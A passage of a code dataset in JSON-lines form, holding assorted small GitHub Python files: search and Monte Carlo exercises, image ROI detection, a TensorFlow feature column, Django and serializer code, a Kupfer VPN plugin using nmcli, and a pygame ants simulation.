\"OCT\",\n \"NOV\",\n \"DIC\",\n \"ANUAL\",\n ]\n\n return meses[int_mes - 1]\n\n def set_style(self, cell, font=None, alignment=None, border=None, fill=None):\n if font is not None:\n cell.font = self.fonts[font]\n if alignment is not None:\n cell.alignment = self.alignments[alignment]\n if border is not None:\n cell.border = self.borders[border]\n if fill is not None:\n cell.fill = 
self.colors[fill]\n","repo_name":"ImperialCollegeLondon/paricia","sub_path":"unused_apps/reportes_v2/titulos.py","file_name":"titulos.py","file_ext":"py","file_size_in_byte":9738,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"73859796107","text":"import math\r\n\r\n# jump search: probe every val-th element, then scan the matching block linearly\r\nkey = 346\r\nl = [2, 3, 5, 7, 8, 34, 78, 99, 346, 567, 568, 678, 876, 984, 999]\r\ns = len(l)\r\nval = math.ceil(math.sqrt(s))  # block (jump) size: ceil(sqrt(n))\r\np = -1  # start of the block to scan linearly; -1 means no scan is needed\r\nfor i in range(0, s, val):\r\n    if l[i] == key:\r\n        print(i)\r\n        break\r\n    elif l[i] > key:\r\n        p = max(i - val, 0)  # the key can only be in the previous block\r\n        break\r\nelse:\r\n    p = max(s - val, 0)  # the key may sit in the last, incomplete block\r\nif p >= 0:\r\n    for w in range(p, s):\r\n        if l[w] == key:\r\n            print(w)\r\n            break\r\n","repo_name":"Faizan10933/musical-octo-chainsaw","sub_path":"jumpsearch_by_me.py","file_name":"jumpsearch_by_me.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"71895683787","text":"# Programming Assignment 1, Circle \"Volume\"\n# Ethan Kupka\n# Sept 27th, 2019\n\nimport random\nimport math\n\ndart = int(input(\"How many darts are you throwing?\"))\nnumdarts = dart\ninsideCount = 0\n\nfor i in range(numdarts):\n    randx = 2 * random.random() - 1\n    randy = 2 * random.random() - 1\n    randz = 2 * random.random() - 1\n    x = randx\n    y = randy\n    z = randz\n    freddistance = x**2 + y**2 + z**2\n    #for statement\n\n    if freddistance <= 1:\n        insideCount = insideCount + 1\n    #if statement\n\narea = (insideCount / numdarts) * 8\nprint(\"Volume of the 3D Sphere is:\", area)\nrvolume = (4/3) * math.pi\nprint(\"This is the actual volume:\", rvolume)\n\n#Dimension Names: S3D) S2 R3\n#EVS: V = (4/3)*pi*r^3\n#Equation: X^2 + y^2 + z^2 < 1\n#Program intentions: Estimating the volume in the sphere\n#Monte Carlo Method, pi is not given.\n
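\n# (added note) why the factor of 8: darts are drawn uniformly from the cube [-1, 1]^3, whose volume is\n# 2^3 = 8, so P(inside sphere) is approximated by insideCount/numdarts and V = 8 * insideCount/numdarts.\n# No value of pi is needed for the estimate itself, only for the exact comparison value.\n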
\n# Result 1) Darts(1000) Volume of the 3D Sphere is: 3.968 - This is the actual volume: 4.1887902047863905\n# The estimated and the correct answers aren't very close; they are around .2 apart.\n\n# Result 2) Darts(1000000) Volume of the 3D Sphere is: 4.184368 - This is the actual volume: 4.1887902047863905\n# The estimated and the correct answers are very close; they only begin to differ at the third decimal place. Throwing more darts improved the estimate a lot.\n\n# Result 3) Darts(10) Volume of the 3D Sphere is: 3.2 - This is the actual volume: 4.1887902047863905\n# The estimated and the correct answers aren't close; the estimate is .9 off.\n","repo_name":"Ekupka1/Python-Code","sub_path":"EstOfVolume.py","file_name":"EstOfVolume.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"72904242509","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\nimport cv2 as cv\nfrom skimage.segmentation import felzenszwalb\nfrom skimage.measure import regionprops\nfrom random import randint\nborderType = cv.BORDER_REPLICATE\n\ncolors = ['red', 'green']\n\nanimals_names = ['deer', 'wild_boar']\n\n\ndef mark_regions(img, segments, animals=None, reference_bbox=None):\n    fig, ax = plt.subplots(ncols=1, nrows=1, figsize=(6, 6))\n    ax.imshow(img)\n    i = 0\n    for region in regionprops(segments):\n        minr, minc, maxr, maxc = region.bbox\n        if check_roi_cond(region, img) is True:\n            if animals[i] == 0:\n                rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,\n                                          fill=False, edgecolor='red', label=\"deer\", linewidth=2)\n            if animals[i] == 1:\n                rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,\n                                          fill=False, edgecolor='green', label=\"wild boar\", linewidth=2)\n            ax.add_patch(rect)\n            i += 1\n    for bbox in reference_bbox:\n        minc, minr, maxc, maxr = bbox\n        rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,\n                                  fill=False, edgecolor='blue', linewidth=2)\n        ax.add_patch(rect)\n    ax.legend()\n    plt.show()\n\n\ndef norm_roi_to_square(roi):\n    roi = cv.cvtColor(roi, cv.COLOR_BGR2GRAY)\n    value = [randint(0, 255)]\n    if roi.shape[0] > roi.shape[1]:\n        param = roi.shape[0] - roi.shape[1]\n        left = int(param / 2)\n        right = int(param / 2)\n        norm_roi = cv.copyMakeBorder(roi, 0, 0, left, right, borderType, None, value)\n        #plot_img(norm_roi)\n        img_norm = cv.resize(norm_roi, (128, 128))\n        #plot_img(img_norm, title=\"normalized object\")\n        return img_norm\n    elif roi.shape[0] < roi.shape[1]:\n        param = roi.shape[1] - roi.shape[0]\n        bottom = int(param/2)\n        top = int(param/2)\n        norm_roi = cv.copyMakeBorder(roi, top, bottom, 0, 0, borderType, None, value)\n        #plot_img(norm_roi)\n        img_norm = cv.resize(norm_roi, (128, 128))\n        #plot_img(img_norm, title=\"normalized object\")\n        return img_norm\n    else:\n        #plot_img(roi)\n        img_norm = cv.resize(roi, (128, 128))\n        #plot_img(img_norm, title=\"normalized object\")\n        return img_norm\n\n\ndef check_roi_cond(region, img, small_animal=True):\n    minr, minc, maxr, maxc = region.bbox\n    ratio = (maxc - minc) / (maxr - minr)\n    if region.area <= 100:\n        return False\n    elif abs(maxr - minr - img.shape[0]) < 10 or abs(maxc - minc - img.shape[1]) < 10:\n        return False\n    elif maxr - minr < 25 or maxc - minc < 25:\n        return False\n    elif ratio > 3 or ratio < 1/3:\n        return False\n    else:\n        return True\n\n\ndef get_falzenszwalb_roi(img):\n    gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n    seg = felzenszwalb(gray, scale=1000, sigma=4, min_size=1)\n    print(\"Felzenszwalb's number of segments: %d\" % len(np.unique(seg)))\n    return seg\n\ndef get_roi(img, segments):\n    roi = []\n    i = 0\n    seg_updated = segments\n    index_to_remove = []\n    for region in regionprops(segments):\n        minr, minc, maxr, maxc = region.bbox\n        if check_roi_cond(region, img) is True:\n            cropped_image = img[minr:maxr, minc:maxc]\n            #plot_img(cropped_image)\n            norm_roi_to_square(cropped_image)\n            
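# (added note) the normalized square returned by norm_roi_to_square() is not kept here; the raw crop is appended below\n            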
roi.append(cropped_image)\n        else:\n            index_to_remove.append(i)\n        i += 1\n    seg_updated = np.delete(seg_updated, index_to_remove)\n    print(f\"Reduced Number of ROI: {len(roi)}\")\n    return roi\n\ndef predicted_to_file(filename, animals, segments, img, confidence=1.):\n    with open('./predicted_boxes/' + filename, \"w\") as f:\n        i = 0\n        for region in regionprops(segments):\n            minr, minc, maxr, maxc = region.bbox\n            if check_roi_cond(region, img) is True:\n                f.write(f\"{animals_names[animals[i]]} {confidence} {minc} {minr} {maxc} {maxr}\\n\")\n                i += 1\n    print(\"file saved!\")\n","repo_name":"lpopek/Automation-of-animal-detection-in-thermal-camera-image","sub_path":"HOG-SVM/find_ROI.py","file_name":"find_ROI.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"6444101716","text":"from tensorflow.python.feature_column import feature_column as fc_old\nfrom tensorflow.python.feature_column import utils as fc_utils\nfrom tensorflow.python.feature_column.feature_column_v2 import (\n    DenseColumn, FeatureColumn, SequenceCategoricalColumn, SequenceDenseColumn)\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.ops import sparse_ops\nfrom tensorflow.python.util import deprecation\n\n_FEATURE_COLUMN_DEPRECATION_DATE = None\n_FEATURE_COLUMN_DEPRECATION = 'The old _FeatureColumn APIs are being deprecated. Please use the new FeatureColumn APIs instead.'\n\n\nclass IndicatorColumnDef(DenseColumn, SequenceDenseColumn, fc_old._DenseColumn, fc_old._SequenceDenseColumn):\n    def __init__(self, categorical_column, size, *args):\n        self.categorical_column = categorical_column\n        self.size = size\n        # super(IndicatorColumn2, self).__init__(*args)\n\n    @property\n    def _is_v2_column(self):\n        return isinstance(self.categorical_column, FeatureColumn) and self.categorical_column._is_v2_column\n\n    @property\n    def name(self):\n        \"\"\"See `FeatureColumn` base class.\"\"\"\n        return '{}_indicator'.format(self.categorical_column.name)\n\n    def _transform_id_weight_pair(self, id_weight_pair):\n        id_tensor = id_weight_pair.id_tensor\n\n        dense_id_tensor = sparse_ops.sparse_tensor_to_dense(\n            id_tensor, default_value=-1)\n\n        # One hot must be float for tf.concat reasons since all other inputs to input_layer are float32.\n        # one_hot_id_tensor = array_ops.one_hot(dense_id_tensor, depth=self.categorical_column.num_buckets, on_value=1.0,\n        #                                       off_value=0.0)\n\n        # dense_id_tensor = math_ops.reduce_sum(dense_id_tensor, axis=[-2])\n        return dense_id_tensor\n\n        # return id_tensor\n\n    def transform_feature(self, transformation_cache, state_manager):\n        id_weight_pair = self.categorical_column.get_sparse_tensors(\n            transformation_cache, state_manager)\n        return self._transform_id_weight_pair(id_weight_pair)\n\n    @property\n    def parse_example_spec(self):\n        \"\"\"See `FeatureColumn` base class.\"\"\"\n        return self.categorical_column.parse_example_spec\n\n    @property\n    def variable_shape(self):\n        \"\"\"Returns a `TensorShape` representing the shape of the dense `Tensor`.\"\"\"\n\n        if isinstance(self.categorical_column, FeatureColumn):\n            # return tensor_shape.TensorShape([1, self.categorical_column.num_buckets])\n            # return tensor_shape.TensorShape([1, self.size])\n            return tensor_shape.TensorShape(1)\n        else:\n            # return tensor_shape.TensorShape([1, self.categorical_column._num_buckets])\n            return tensor_shape.TensorShape(1)\n\n    def get_dense_tensor(self, transformation_cache, state_manager):\n        if isinstance(self.categorical_column, 
SequenceCategoricalColumn):\n            raise ValueError(\n                'In indicator_column: {}. '\n                'categorical_column must not be of type SequenceCategoricalColumn. '\n                'Suggested fix A: If you wish to use DenseFeatures, use a '\n                'non-sequence categorical_column_with_*. '\n                'Suggested fix B: If you wish to create sequence input, use '\n                'SequenceFeatures instead of DenseFeatures. '\n                'Given (type {}): {}'.format(self.name, type(self.categorical_column), self.categorical_column))\n        # Feature has been already transformed. Return the intermediate\n        # representation created by transform_feature.\n        return transformation_cache.get(self, state_manager)\n\n    def get_sequence_dense_tensor(self, transformation_cache, state_manager):\n        \"\"\"See `SequenceDenseColumn` base class.\"\"\"\n        if not isinstance(self.categorical_column, SequenceCategoricalColumn):\n            raise ValueError(\n                'In indicator_column: {}. categorical_column must be of type SequenceCategoricalColumn '\n                'to use SequenceFeatures. Suggested fix: Use one of sequence_categorical_column_with_*. '\n                'Given (type {}): {}'.format(self.name, type(self.categorical_column), self.categorical_column))\n        # Feature has been already transformed. Return the intermediate representation created by transform_feature.\n        dense_tensor = transformation_cache.get(self, state_manager)\n        sparse_tensors = self.categorical_column.get_sparse_tensors(\n            transformation_cache, state_manager)\n        sequence_length = fc_utils.sequence_length_from_sparse_tensor(\n            sparse_tensors.id_tensor)\n        return SequenceDenseColumn.TensorSequenceLengthPair(dense_tensor=dense_tensor, sequence_length=sequence_length)\n\n    @property\n    def parents(self):\n        \"\"\"See 'FeatureColumn` base class.\"\"\"\n        return [self.categorical_column]\n\n    def get_config(self):\n        \"\"\"See 'FeatureColumn` base class.\"\"\"\n        from tensorflow.python.feature_column.serialization import serialize_feature_column\n        # note: this class is a plain class, not a namedtuple, so the fields are listed explicitly\n        config = {'size': self.size}\n        config['categorical_column'] = serialize_feature_column(\n            self.categorical_column)\n        return config\n\n    @classmethod\n    def from_config(cls, config, custom_objects=None, columns_by_name=None):\n        \"\"\"See 'FeatureColumn` base class.\"\"\"\n        from tensorflow.python.feature_column.serialization import \\\n            deserialize_feature_column  # pylint: disable=g-import-not-at-top\n        _check_config_keys(config, ('categorical_column', 'size'))\n        kwargs = _standardize_and_copy_config(config)\n        kwargs['categorical_column'] = deserialize_feature_column(config['categorical_column'], custom_objects,\n                                                                  columns_by_name)\n        return cls(**kwargs)\n\n    @deprecation.deprecated(_FEATURE_COLUMN_DEPRECATION_DATE, _FEATURE_COLUMN_DEPRECATION)\n    def _transform_feature(self, inputs):\n        id_weight_pair = self.categorical_column._get_sparse_tensors(\n            inputs)  # pylint: disable=protected-access\n        return self._transform_id_weight_pair(id_weight_pair)\n\n    @property\n    @deprecation.deprecated(_FEATURE_COLUMN_DEPRECATION_DATE, _FEATURE_COLUMN_DEPRECATION)\n    def _variable_shape(self):\n        return tensor_shape.TensorShape([1, self.categorical_column._num_buckets])  # pylint: disable=protected-access\n\n    @property\n    @deprecation.deprecated(_FEATURE_COLUMN_DEPRECATION_DATE, _FEATURE_COLUMN_DEPRECATION)\n    def _parse_example_spec(self):\n        return self.categorical_column._parse_example_spec  # pylint: disable=protected-access\n\n    @deprecation.deprecated(_FEATURE_COLUMN_DEPRECATION_DATE, _FEATURE_COLUMN_DEPRECATION)\n    def 
_get_dense_tensor(self, inputs, weight_collections=None, trainable=None):\n del weight_collections\n del trainable\n if isinstance(\n self.categorical_column,\n (SequenceCategoricalColumn, fc_old._SequenceCategoricalColumn)): # pylint: disable=protected-access\n raise ValueError(\n 'In indicator_column: {}. '\n 'categorical_column must not be of type _SequenceCategoricalColumn. '\n 'Suggested fix A: If you wish to use DenseFeatures, use a '\n 'non-sequence categorical_column_with_*. '\n 'Suggested fix B: If you wish to create sequence input, use '\n 'SequenceFeatures instead of DenseFeatures. '\n 'Given (type {}): {}'.format(self.name, type(self.categorical_column),\n self.categorical_column))\n # Feature has been already transformed. Return the intermediate\n # representation created by transform_feature.\n return inputs.get(self)\n\n @deprecation.deprecated(_FEATURE_COLUMN_DEPRECATION_DATE, _FEATURE_COLUMN_DEPRECATION)\n def _get_sequence_dense_tensor(self,\n inputs,\n weight_collections=None,\n trainable=None):\n # Do nothing with weight_collections and trainable since no variables are\n # created in this function.\n del weight_collections\n del trainable\n if not isinstance(\n self.categorical_column,\n (SequenceCategoricalColumn, fc_old._SequenceCategoricalColumn)): # pylint: disable=protected-access\n raise ValueError(\n 'In indicator_column: {}. '\n 'categorical_column must be of type _SequenceCategoricalColumn '\n 'to use SequenceFeatures. '\n 'Suggested fix: Use one of sequence_categorical_column_with_*. '\n 'Given (type {}): {}'.format(self.name, type(self.categorical_column),\n self.categorical_column))\n # Feature has been already transformed. Return the intermediate\n # representation created by _transform_feature.\n dense_tensor = inputs.get(self)\n sparse_tensors = self.categorical_column._get_sparse_tensors(\n inputs) # pylint: disable=protected-access\n sequence_length = fc_utils.sequence_length_from_sparse_tensor(\n sparse_tensors.id_tensor)\n return SequenceDenseColumn.TensorSequenceLengthPair(\n dense_tensor=dense_tensor, sequence_length=sequence_length)\n\n\ndef _check_config_keys(config, expected_keys):\n \"\"\"Checks that a config has all expected_keys.\"\"\"\n if set(config.keys()) != set(expected_keys):\n raise ValueError(\n 'Invalid config: {}, expected keys: {}'.format(config, expected_keys))\n\n\ndef _standardize_and_copy_config(config):\n \"\"\"Returns a shallow copy of config with lists turned to tuples.\n\n Keras serialization uses nest to listify everything.\n This causes problems with the NumericColumn shape, which becomes\n unhashable. 
We could try to solve this on the Keras side, but that\n    would require lots of tracking to avoid changing existing behavior.\n    Instead, we ensure here that we revive correctly.\n\n    Args:\n      config: dict that will be used to revive a Feature Column\n\n    Returns:\n      Shallow copy of config with lists turned to tuples.\n    \"\"\"\n    kwargs = config.copy()\n    for k, v in kwargs.items():\n        if isinstance(v, list):\n            kwargs[k] = tuple(v)\n\n    return kwargs\n","repo_name":"darkchats/notekeras","sub_path":"notekeras/features/feature_column_def.py","file_name":"feature_column_def.py","file_ext":"py","file_size_in_byte":10553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"}
+{"seq_id":"35259053450","text":"def show_all():\n    with open('data.txt', 'r', encoding='UTF-8') as file:\n        content = file.read()\n    return content\n\n\ndef add_contact(user):\n    with open('data.txt', 'a', encoding='UTF-8') as file:\n        file.write(user)\n\ndef error():\n    print('error')\n\ndef search(data_str):\n\n    with open('data.txt', 'r', encoding='UTF-8') as file:\n        count = True\n        lst_str = file.readlines()\n        for worker in lst_str:\n            if data_str in worker:\n                print(worker)\n                count = False\n        if count:\n            print('\\nNo such user found.\\n')\n\ndef change_contact(data_str):\n    with open('data.txt', 'r', encoding='UTF-8') as f1:\n        lines = f1.readlines()\n\n    # rewrite the file, replacing the matching line with freshly entered data\n    with open('data.txt', 'w', encoding='UTF-8') as f1:\n        for worker in lines:\n            if data_str in worker.strip():\n                f1.write(input() + '\\n')\n            else:\n                f1.write(worker)\n\n\n","repo_name":"dzhon505/pythonGB_HomeWorks","sub_path":"seminar8/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"28740755740","text":"from django.urls import path, include\nfrom . 
import views\n\nurlpatterns = [\n    path('index/', views.index, name='index1'),\n    path('products/', views.products, name='product'),\n    path('', views.index, name='homepage'),\n    path('form/', views.form, name='form'),\n    path('details/', views.details, name='details')\n\n    # path(\"\",include('views.index'))\n\n]\n","repo_name":"ShashwatKumar01/Ecommerce-Site-Django","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"37018022931","text":"import config as cfg\r\nfrom simple_pid import PID\r\n\r\npidx = PID(cfg.PID_P, cfg.PID_I, cfg.PID_D, setpoint=0)\r\npidy = PID(cfg.PID_P, cfg.PID_I, cfg.PID_D, setpoint=0)\r\npidx.output_limits = (-1, 1)\r\npidy.output_limits = (-1, 1)\r\npidx.sample_time = cfg.interval\r\npidy.sample_time = cfg.interval\r\n\r\n\r\ndef calculatePID(ptobj, pttgt):\r\n    ptx = ptobj[0] - pttgt[0]\r\n    pty = ptobj[1] - pttgt[1]\r\n    controlx = pidx(ptx)\r\n    controly = pidy(pty)\r\n    return [controlx, controly]\r\n","repo_name":"RAMOTS/autoguiding","sub_path":"stereoPID.py","file_name":"stereoPID.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
+{"seq_id":"74288068749","text":"\"\"\"Contains the serializers for the devices app.\"\"\"\nfrom rest_framework import serializers as s\n\nfrom .models import Device, Screenshot, Chaver, Log\n\n\nclass UninstallCodeSerializer(s.ModelSerializer):\n    \"\"\"Serializer for uninstall code\"\"\"\n    class Meta: # pylint: disable=missing-class-docstring\n        model = Device\n        fields = ('uninstall_code',)\n        read_only_fields = ('uninstall_code',)\n\nclass ScreenshotSerializer(s.HyperlinkedModelSerializer):\n    \"\"\"Serializer for the Screenshot model.\"\"\"\n    class Meta: # pylint: disable=missing-class-docstring\n        model = Screenshot\n        fields = ('id','device','image', 'created','nsfw','false_positive')\n\n\n\nclass ScreenshotUploadSerializer(s.Serializer):\n    \"\"\"Serializer for uploading the Screenshots.\"\"\"\n    title = s.CharField(required = False)\n    exec_name = s.CharField( required = False)\n    base64_image = s.CharField(trim_whitespace=False) # Base64-encoded image data\n\n    nsfw = s.BooleanField(default=False)\n    profane = s.BooleanField(default=False)\n\n    nsfw_detections = s.JSONField(default=dict)\n    created = s.DateTimeField()\n\n    false_positive = s.BooleanField(default=False)\n\n    def create(self, validated_data:dict, device:Device):\n        \"\"\"Create a new screenshot.\"\"\"\n        from .utils import decode_base64_to_numpy, numpy_to_content_file,deobfuscate_text\n        \n        # DeObfuscate the title and exec_name\n        if 'title' in validated_data:\n            title = deobfuscate_text(validated_data.pop('title'))\n        else:\n            title = 'Unknown Title'\n        if 'exec_name' in validated_data:\n            exec_name = deobfuscate_text(validated_data.pop('exec_name'))\n        else:\n            exec_name = 'Unknown Exec Name'\n\n        # Decode the base64 image\n        base64_image = validated_data.pop('base64_image')\n        image = decode_base64_to_numpy(base64_image)\n        file = numpy_to_content_file(image)\n\n        # Create the screenshot\n        screenshot = Screenshot.objects.create(\n            title=title,\n            exec_name=exec_name,\n            image=file,\n            device=device,\n            **validated_data\n        )\n        return screenshot\n\nclass ChaverSerializer(s.ModelSerializer):\n    \"\"\"Serializer for the Chaver model.\"\"\"\n    class Meta: # pylint: disable=missing-class-docstring\n        model = Chaver\n        fields = ('id', 'name', 'email',\"device\", 'created')\n\nclass 
VerifyUninstallCodeSerializer(s.Serializer):# pylint: disable=abstract-method\n    \"\"\"Serializer for verifying the uninstall code\"\"\"\n    uninstall_code = s.CharField(max_length=100)\n\nclass DeviceSerializer(s.ModelSerializer):\n    \"\"\"This is the serializer for the Device model\"\"\"\n    user = s.HiddenField(default=s.CurrentUserDefault())\n\n    chavers = ChaverSerializer(many=True, read_only=True)\n    screenshots = ScreenshotSerializer(many=True, read_only=True)\n\n    class Meta: # pylint: disable=missing-class-docstring\n        model = Device\n        fields = ('id','user','name','created','registered','screenshots','chavers')\n        read_only_fields = ('created','screenshots','chavers','id','registered','user')\n\n    ","repo_name":"dickermoshe/OpenChaver-Server","sub_path":"backend/devices/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"10743098228","text":"\"\"\"\nStart/Stop connections of NetworkManager via nmcli\n\"\"\"\n__kupfer_name__ = _(\"VPN - NMCLI\")\n__kupfer_sources__ = (\"ConnectionSource\",)\n__kupfer_actions__ = (\"Connect\", \"Disconnect\",)\n__description__ = _(\"Connects and disconnects VPN connections using the nmcli command\")\n__version__ = \"\"\n__author__ = \"Benjamin Jacob \"\n\nfrom kupfer.objects import Action, Source, Leaf, TextLeaf\nfrom kupfer.obj.apps import ApplicationSource\nfrom kupfer import icons\nfrom kupfer import utils\nimport subprocess\nimport os\nimport time\n\n# icons\nconnection_icon = \"security-high\"\nsource_icon = \"network-vpn\"\naction_connect = \"network-connect\"\naction_disconnect = \"network-disconnect\"\n\n# cli - commands\nlistConnections = \"nmcli -t -f uuid,name,type connection show\"\nactiveUuids = \"nmcli -t -f uuid connection show --active\"\nconnectUUid = \"nmcli connection up \"\ndisconnectUUid = \"nmcli connection down \"\n\n# display only VPN connections\nvpnonly = True\n# print debugging output\nverbose = False\n\nclass Connect(Action):\n    def __init__(self):\n        Action.__init__(self, _(\"Connect\"))\n\n    def activate(self, leaf):\n        # utils.spawn_async(connectUUid + leaf.uuid)\n        run_cmd(connectUUid + leaf.uuid, True)\n        leaf.active = True\n\n    def get_description(self):\n        return _(\"connects a vpn connection\")\n\n    def get_icon_name(self):\n        return action_connect\n\n    def get_gicon(self):\n        return icons.ComposedIcon(source_icon, action_connect)\n\n\nclass Disconnect(Action):\n    def __init__(self):\n        Action.__init__(self, _(\"Disconnect\"))\n\n    def activate(self, leaf):\n        # utils.spawn_async(disconnectUUid + leaf.uuid)\n        run_cmd(disconnectUUid + leaf.uuid, True)\n        leaf.active = False\n\n    def get_description(self):\n        return _(\"disconnects a vpn connection\")\n\n    def get_icon_name(self):\n        return action_disconnect\n\n    def get_gicon(self):\n        return icons.ComposedIcon(source_icon, action_disconnect)\n\n\nclass ConnectionSource(ApplicationSource):\n    source_user_reloadable = False\n    appleaf_content_id = \"vpn-nmcli\"\n    source_use_cache = False\n\n    def is_dynamic(self):\n        \"\"\"\n        Whether to recompute contents each time it is accessed\n        \"\"\"\n        return True\n\n    def __init__(self):\n        self.connections = []\n        self.active_ids = []\n\n        # don't query connection state at short intervals (< 10 secs)\n        self.last_update_con_state = 0\n        self.max_age_con_state_secs = 10\n\n        # available connections don't change often\n        self.last_update_connections = 0\n        self.max_age_connections_secs = 120\n\n        Source.__init__(self, _(\"VPN - 
Connections\"))\n\n def update_connection_states(self):\n self.active_ids = []\n if verbose:\n print(\"query connection state\")\n (stdout, exitcode) = run_cmd(activeUuids)\n lines = stdout.split(\"\\n\")\n for activeUuid in lines:\n if not activeUuid:\n continue\n self.active_ids.append(activeUuid)\n\n for con in self.connections:\n con.active = con.uuid in self.active_ids\n if verbose:\n print(\"connection \"+con.name+\" is active:\"+str(con.uuid in self.active_ids))\n\n def update_available_connections(self):\n if verbose:\n print(\"query overall available connections\")\n (stdout, exitcode) = run_cmd(listConnections, False)\n lines = stdout.split(\"\\n\")\n for connStr in lines:\n if not connStr:\n continue\n parts = connStr.split(\":\")\n con_type = parts[2]\n\n if vpnonly and con_type != \"vpn\" and con_type != \"wireguard\":\n continue\n\n uuid = parts[0]\n name = parts[1]\n active = False\n if verbose:\n print(\"connection \"+name+\" is active \" + str(active))\n self.connections.append(Connection(uuid, name, active))\n\n def initialize(self):\n now = time.time()\n if now - self.max_age_connections_secs > self.last_update_connections:\n self.update_available_connections()\n self.last_update_connections = now\n\n if now - self.max_age_con_state_secs > self.last_update_con_state:\n self.update_connection_states()\n self.last_update_con_state = now\n\n def get_items(self):\n \"\"\"thing\"\"\"\n self.initialize()\n for connection in self.connections:\n yield connection\n\n def get_icon_name(self):\n return source_icon\n\n def provides(self):\n yield Connection\n\n\nclass Connection(Leaf):\n \"\"\"The Note Leaf's represented object is the Note URI\"\"\"\n\n def __init__(self, uuid, name, active):\n self.uuid = uuid\n self.name = name\n self.active = active\n Leaf.__init__(self, self.uuid, name)\n\n def get_actions(self):\n if not self.active:\n if verbose:\n print(self.name + \" is active conn,discon\")\n c = Connect()\n c.rank_adjust = 9\n dc = Disconnect()\n dc.rank_adjust = 5\n yield c\n yield dc\n else:\n if verbose:\n print(self.name + \" is active, discon,con\")\n c = Connect()\n c.rank_adjust = 2\n dc = Disconnect()\n dc.rank_adjust = 5\n yield dc\n yield c\n\n def repr_key(self):\n # the Note URI is unique&persistent for each note\n return self.uuid\n\n def get_description(self):\n # TODO: how to translate this ?\n connected = _(\"established\")\n if not self.active:\n connected =_(\"closed\")\n return _(\"The connection\") + \" \"+str(self.name) + \" \" + _(\"is\") + \" \" + connected\n\n def get_icon_name(self):\n return connection_icon\n\n def get_gicon(self):\n if self.active:\n return icons.ComposedIcon(source_icon, action_connect)\n else:\n return icons.ComposedIcon(source_icon, action_disconnect)\n\n\ndef run_cmd(cmd, runAsync=False):\n if verbose:\n print(\"exec cmd: \" + cmd)\n if runAsync:\n subprocess.Popen(cmd, shell=True)\n return\n\n process = subprocess.Popen(cmd,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True,\n preexec_fn=os.setpgrp)\n # collect stdout & stderr\n try:\n stdoutdata, errs = process.communicate(timeout=15)\n except subprocess.TimeoutExpired:\n process.kill()\n stdoutdata, errs = process.communicate()\n return [stdoutdata, process.returncode]\n\n","repo_name":"dodophoenix/kupfer-networkmanager","sub_path":"vpn-nmcli.py","file_name":"vpn-nmcli.py","file_ext":"py","file_size_in_byte":6754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} 
+{"seq_id":"71357629069","text":"from os import environ\n\nimport collision_detection\nfrom src.game_statistics import GameStatistics\n\nenviron['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'\n# noqa: E402\nimport pygame\nfrom ants.colony import Colony\nfrom game_settings import SCREEN_WIDTH, SCREEN_HEIGHT, AMOUNT_OF_ANTS, ANT_SIZE\n\n# pygame setup\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Ants\")\nfont = pygame.font.Font(None, 24) # You can replace 'None' with a font file path if needed\n\nclock = pygame.time.Clock()\nstart_time = pygame.time.get_ticks()\nrunning_for = 0\nrunning = True\ndt = 0\ndrawn = 0\n\ntext_x = 100\ntext_y = 200\n\ngreen = (0, 255, 0)\nred = (255, 0, 0)\n\n# colony\ncolony = Colony(\"red\", int(AMOUNT_OF_ANTS / 2), ANT_SIZE, red)\ncolony_2 = Colony(\"green\", int(AMOUNT_OF_ANTS / 2), ANT_SIZE, green)\n\ngame_statistics = GameStatistics()\n\nwhile running:\n # poll for events\n # pygame.QUIT event means the user clicked X to close your window\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # update\n colony.update()\n colony_2.update()\n\n\n\n\n # fill the screen with a color to wipe away anything from last frame\n screen.fill(\"black\")\n\n # draw colony / find out if this is truly 60fps\n colony.draw(screen)\n colony_2.draw(screen)\n # end update\n\n collision_detection.fight(colony, colony_2)\n # draw statistics\n game_statistics.update(dt)\n game_statistics.draw_statistics(screen, font, [colony, colony_2])\n\n\n\n # END OF DRAWING\n pygame.display.flip()\n # limits FPS to 60\n # dt is delta time in seconds since last frame, used for framerate-\n # independent physics.\n dt = clock.tick(60) / 1000\npygame.quit()\n","repo_name":"DavidGoestemeier/ants","sub_path":"src/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"35587448562","text":"from django.shortcuts import render, redirect\nfrom .forms import CustomUserCreationForm, LoginForm\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib import messages\n# from .models import App_users\n\n# Create your views 